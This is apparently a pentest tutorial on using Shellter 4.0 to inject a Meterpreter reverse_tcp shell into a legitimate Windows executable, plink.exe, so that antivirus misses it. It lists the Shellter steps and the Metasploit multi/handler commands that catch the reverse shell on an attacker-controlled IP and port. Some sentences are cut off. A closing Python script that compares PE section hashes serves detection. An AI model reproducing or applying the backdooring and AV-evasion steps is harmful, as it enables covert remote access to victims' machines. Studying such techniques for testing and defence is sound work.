Having trouble getting a
Meterpreter shell past that pesky AV? Check out the new Shellter 4.0 shell
The latest version of Shellter for
pentesters was revealed at B-Sides Lisbon earlier this month. Updates
include increased obfuscation through a custom encoder and polymorphic
decoder. Also this version saves a few steps by including the most common
Shellter takes a legit
Windows .exe file, adds the shellcode to it and then does a great job of
modifying the file for AV bypass. The program’s automatic mode makes the
whole process painless. In this tutorial I used the latest version of
Kali Linux and a Windows 7 virtual machine.
Note: the Kali repos apparently
don’t contain the newest 4.0 version yet. To get the latest, instead of
using ‘apt-get install shellter’, just download and extract the ZIP file to
the “/etc/share” folder.
2. Grab “plink.exe”
from Kali’s ‘/usr/share/windows-binaries’ directory and copy it into the
3. Start Shellter – ‘shellter’
from the terminal or use ‘wineconsole shellter’ from ‘/etc/share/shellter’ if
you manually installed.
4. Choose ‘A’ for Automatic Mode
5. At the PE Target Prompt, enter “plink.exe”
6. When prompted for Payloads select “L” and
7. Next, enter the IP address of your Kali system (mine is 192.168.1.39)
8. And the port to use (I used 5555)
Shellter will obfuscate the code and crunch for a while. Then you should see:
9. Now we need to start a listener service on
the Kali system using the same settings from above:
• start Metasploit (‘msfconsole’ in a
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.1.39
• set lport 5555
10. Now that Kali is waiting for a connection,
copy our evil plink.exe command
to the Windows 7 system and run it:
And we have a shell!
Compare the size of the backdoored exe to the original one. They are the exact same size! Now upload the backdoored exe to VirusTotal and scan it for malicious content.
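For a defender, the identical file size noted above means size says nothing about integrity; comparing the suspect file against a trusted copy by hash, section by section, shows that it was altered and where. The Python sketch below is an added example, not part of the original tutorial: the function names are hypothetical, and `build_sample` constructs a minimal PE-like image as stand-in data so the check runs offline.

```python
import hashlib
import struct

def pe_sections(data):
    """Return {section name: (SHA-256 of raw data, characteristics)} for a PE image."""
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)       # offset of the PE header
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsect, = struct.unpack_from("<H", data, e_lfanew + 6)      # NumberOfSections
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 20)  # SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                           # start of section table
    out = {}
    for i in range(nsect):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)
        flags, = struct.unpack_from("<I", data, off + 36)
        out[name] = (hashlib.sha256(data[raw_ptr:raw_ptr + raw_size]).hexdigest(), flags)
    return out

def compare(reference, suspect):
    """List differences between a trusted copy and a suspect copy of the same file."""
    findings = []
    if len(reference) == len(suspect):
        findings.append("same size")
    if hashlib.sha256(reference).digest() != hashlib.sha256(suspect).digest():
        findings.append("file hash differs")
    ref, sus = pe_sections(reference), pe_sections(suspect)
    for name in sorted(set(ref) | set(sus)):
        if ref.get(name) != sus.get(name):      # content or flags changed, or section added/removed
            findings.append("section %s changed" % name)
    return findings

def build_sample(text_bytes):
    """Constructed two-section PE-like image (only the header fields the parser reads)."""
    hdr = bytearray(0x200)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HH", hdr, 0x44, 0x14C, 2)   # machine, number of sections
    struct.pack_into("<H", hdr, 0x54, 0xE0)        # size of optional header
    for i, (name, ptr, flags) in enumerate([(b".text", 0x200, 0x60000020),
                                            (b".data", 0x400, 0xC0000040)]):
        off = 0x40 + 24 + 0xE0 + 40 * i
        hdr[off:off + len(name)] = name
        struct.pack_into("<II", hdr, off + 16, 0x200, ptr)
        struct.pack_into("<I", hdr, off + 36, flags)
    return bytes(hdr) + text_bytes.ljust(0x200, b"\x90") + b"\0" * 0x200
```

In practice the reference bytes come from a copy obtained from the vendor or a hash published by it, and a failed Authenticode signature check on a normally signed binary points the same way.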